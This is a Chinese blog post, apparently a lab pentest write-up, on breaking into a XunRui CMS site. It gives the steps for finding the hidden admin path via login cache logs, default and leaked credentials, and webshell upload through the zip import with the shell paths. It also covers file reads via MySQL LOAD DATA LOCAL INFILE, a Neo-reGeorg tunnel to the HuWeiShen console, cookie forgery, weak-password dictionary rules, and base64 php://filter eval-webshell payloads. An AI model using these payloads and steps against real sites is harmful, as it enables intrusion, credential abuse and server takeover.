迅睿CMS漏洞思考

遇到个靶机是迅睿CMS :

某CMS漏洞总结_长白山攻防实验室的博客-CSDN博客

后续补充:

一:后台地址

默认后台为/admin.php

遇到的靶机是/houtai.php

目标旁站存在备份 版本为5. 4,靶机也存在备份,版本为5.1

旁站情况:网站根目录下存在 /www.zip

里面数据库配置信息和后台地址都是假的,

/tool/login.php  是迅睿工具箱地址 这个的密码是 wangbiao88,登录进去可修改后台密码,后面找到后台后一样的密码。

第一步:找后台地址:

默认地址和扫目录没发现后台地址但发现个/houtai/的目录路径 就是没去试/houtai.php

/houtai.php 这个后台路径是在

/cache/log/202206/04.php   (按照年月/日期)如果登录了不管成功和失败就会生成缓存文件,密码错误会记录错误的md5密码,不管成功失败都会记录显示用户名登录。我遇到成功了也记录了。

通过此文件成功找到后台地址。

默认用户名admin   密码就是泄露的迅睿工具箱源代码中的密码 \tool\config\pwd.php

二:旁站拿shell

后台拿shell:后台"应用"->“联动菜单”->"导入"处可上传zip文件

本地新建一个123文件夹 再建立一个123文件夹 再放入你的shell.php

压缩之后 --导入  

shell路径:抓包会返回 目录 一般为

/cache/temp/linkage-import-file-1-1/123/123/shell.php 

/cache/temp/linkage-import-file-1-2/123/123/shell.php 

/cache/temp/linkage-import-file-1-3/123/123/shell.php 

三:尝试提权

拿到webshell之后。护卫神,不支持aspx及aspx php很多马都杀,不能执行命令,反弹也执行不了。不能直接跨站,

mysql数据库低权限也不能都文件。

1.  CREATE TABLE `bbs` (`bbs1` TEXT NOT NULL ); 

2.  load data local infile '//home//opendb.php' into table bbs;

3.  LOAD DATA LOCAL INFILE '/home/opendb.php' into table bbs fields terminated by '' LINES TERMINATED BY '\0';   (转义用这个)

网上护卫神主机提权, 那个6588端口(直接访问是访问不到的需要做socks代理),php文件获取session 伪造cookie  3x版本应该可以,目标4x版本测试了不行。

过程:上传Neo-reGeorg

生成python neoreg.py generate -k pass@123 生成socks5  shell 上传目标服务器

 python neoreg.py -k pass@123 -u http://www.abcd.com/cache/temp/linkage/import-file-1-2/cc/cc/tunnel.php  (本机执行)

安装Proxifier --  127.0.0.1  1080  选择浏览器进程,范围为,内网ip或目标范围(本机配置)

浏览器输入 目标地址:6588 即可成功访问 护卫神 控制台

低版本默认 管理帐户:huweishen  管理密码:huweishen.com

高版本的是随机的强密码。

利用护卫神 那个php脚本获取到cookie是随机的,3x版本应该可以,4x不行。

修改cookies 可以使用浏览器cookies插件,也可以使用 

浏览器 按F12  输入document.cookie 会显示cookies值 

输入 document.cookie="获取到cookies  还有path值"  回车 F5刷新即可修改cookies了。

四:目标情况。

目标情况:网站根目录也存在备份/backupdata.zip  但是dedecms的信息,没啥用

其实:网站后台登录会记录内容写缓存到php文件,文件路径为:/cache/log/202206/04.php(按照年月/日期)闭合了但是被转义了,没能getshell,

按照别人总结的版本提示文件不存在,也没拿到shell,

迅睿工具箱地址也没有,后台是猜进去的。

按照旁站的版本,构造一样的包提示的,导入不能getshell  少导入那个upload模块。(旁站是import_upload) 这个版本没有只有import

旁站尽量搞.net的站点。

还有一个社工密码生成的规则。

公司名:如湘潭创荣经济发展集团有限公司 :密码就是chuangrou88 且存在用户名chuangrou
那么他可能的用户名有:

xtcf

xtcr

chuangfa

chuangrou

湘潭网丹互联网集团有限公司官网:密码就是wangdan88
wdjt
wangdan
xtwd

根据关键字组合去生成弱口令字典

补充:PHP文件上传绕过-死亡exit.txt

https://www.equinox.chat/archives/28/

payload1:

txt=aPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=convert.base64-decode/resource=shell.php

payload2:

txt=PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值